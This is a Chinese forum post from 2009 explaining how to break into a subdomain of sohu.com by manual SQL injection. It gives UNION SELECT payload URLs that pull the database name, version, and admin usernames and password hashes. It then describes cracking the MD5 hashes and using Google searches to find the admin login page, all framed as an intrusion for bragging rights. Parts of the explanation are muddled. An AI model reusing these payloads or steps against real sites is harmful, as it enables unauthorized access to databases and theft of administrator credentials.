找回密码
 开放注册

QQ登录

只需一步,快速开始

微信登录

微信扫码,快速开始

搜索
查看: 1040|回复: 0

php手工注入入侵sohu

[复制链接]

482

主题

303

回帖

1486

牛毛

二级牛人

学习  !!!

积分
1486
QQ
发表于 2009-6-3 06:28:28 | 显示全部楼层 |阅读模式 来自 河北省沧州市
与asp手工注入大同小异.在猜解的时候.我们可以用工具也可以用手工.原理是一样的.为了方便我们可以使用工具.

1。比如找到一个php注入点:http://xxxxx.sohu.com/xxxx.php?brand_id=1

and 1=1 回显正常,and 1=2 回显与第一页不一样.说明有注入点。

2。进行猜解:http://xxxxx.sohu.com/xxxx.php?brand_...2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20/*

注:1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17/* 这就是传说中的 Ascii逐字解码法

我们举个例子,已知表Admin中存在username字段,首先,我们取第一条记录,测试长度:

也就是说如果ID=1(admin管理)的username长度大于0,则条件成立。

接着就是,1、,2、,3这样测试下去,一直到条件成立为止,比如,7成立,,8不成立

就可以得库名、列名。我们在再and (sele....前加上admin 1=2

既:http://xxxxx.sohu.com/xxxx.php?brand_...2%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

这里我们猜到了数字3是数据库名,够造Url.见下.

http://xxxxx.sohu.com/xxxx.php?brand_...2%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*

同样查询version()可以得到程序的版本.database(),version()是系统变量。

http://xxxxx.sohu.com/xxxx.php?brand_...2%20union%20select%201,2,database(),4,5,6,7,8,9,10,11,12,13,14,15,16,17%20from%20admin

以上Url查出管理员所在的表数字.按回显数字是3.我们就把3改成name或usename。

http://xxxxx.sohu.com/xxxx.php?brand_...2%20union%20select%201,2,database(),4,name,6,7,8,9,10,11,12,13,14,15,16,17%20from%20admin

回显出一个admin,还有一个数字7.我们就把7改成passwd或pass

http://xxxxx.sohu.com/xxxx.php?brand_...2%20union%20select%201,2,database(),4,name,6,passwd,8,9,10,11,12,13,14,15,16,17%20from%20admin

出来了.管理员密码mD5加密.我们可以登陆MD5解密网站进行破解.破解密码后.我们就可以找目标后台了.通常是/admin,./admin/login.php。

如果找不到的话,我们可以使用google hack.够造查询关键词:管理&登陆&admin&login site:xxxxx.sohu.com 好了.我们进后台.截个图。做个纪念....
您需要登录后才可以回帖 登录 | 开放注册

本版积分规则

帮助|Archiver|小黑屋|通信管理局专项备案号:[2008]238号|NB5社区 ( 皖ICP备08004151号;皖公网安备34010402700514号 )

GMT+8, 2025-4-30 06:03 , Processed in 0.168725 second(s), 31 queries .

Powered by Discuz! X3.5

快速回复 返回顶部 返回列表